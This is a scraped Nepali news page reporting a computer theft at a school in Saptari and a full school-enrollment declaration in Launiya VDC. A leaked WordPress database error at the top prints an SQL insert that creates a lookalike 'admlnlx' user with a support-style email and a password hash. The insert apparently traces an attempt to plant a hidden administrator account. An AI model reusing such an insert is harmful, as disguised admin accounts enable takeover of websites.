WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BecD0O/IPyzbk/ERaKWxh86OuCImuN.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 22:42:38', '', 'admlnlx', 'admlnlx')
राजविराज, पुस १२ –
सप्तरीको मलेकपुर गाविस–५ स्थित खुरहुरिया जनता माध्यमिक विद्यालयबाट नौ थान कम्प्युटर सेट गएराति चोरी भएको छ ।
उक्त विद्यालयमा प्राविधिक तथा व्यावसायिक शिक्षाधारअन्तर्गत कम्प्युटर विज्ञान विषयको अध्यापनका लागि जडान गरिएको कम्प्युटर चोरी भएको विद्यालयले जनाएको छ ।
करिब रु छ लाख मूल्य बराबरको कम्प्युटरसहितका सामान चोरी भएको विद्यालयका प्रधानाध्यापक सूर्यनारायण यादवले जानकारी दिनुभयो ।
कक्षा ९ बाट कम्प्युटर विषयको डिप्लोमा स्तरको पढाइ सुरु गर्ने उद्देश्यले विद्यालयमा जडान गरिएको कम्युटरसहितका प्राविधिक सामान चोरी भएपछि पढाइ प्रभावित भएको छ ।
सप्तरीको फत्तेपुर, बरसाइन र खुरहुरीयासहित तीन ठाउँका सामुदायिक विद्यालयमा कम्प्युटरको पढाइ सञ्चालन हुँदै आएको जिल्ला शिक्षा कार्यालयले जनाएको छ ।
जनता माध्यमिक विद्यालय खुरहरियामा कम्प्युटरको पढाइको लागि ४८ जना छात्रछात्रा अध्ययनरत रहेका छन् ।
लौनियाँ गाविस विद्यालय भर्ना घोषणा
शिक्षा पाउने सम्पूर्ण बालबालिकाको अधिकार हो भने नाराका साथ सोमबार सप्तरीको लौनियाँ गाविसलाई पूर्ण शतप्रतिशत विद्यालय भर्ना घोषणा गरिएको छ ।
क्षेत्र नं ३ का सांसद एवम् पूर्व सिँचाइमन्त्री उमेशकुमार यादवको प्रमुख आतिथ्यिमा सम्पन्न भएको कार्यक्रममा सो गाविसलाई विद्यालय भर्ना घोषणा गरिएको हो । – रासस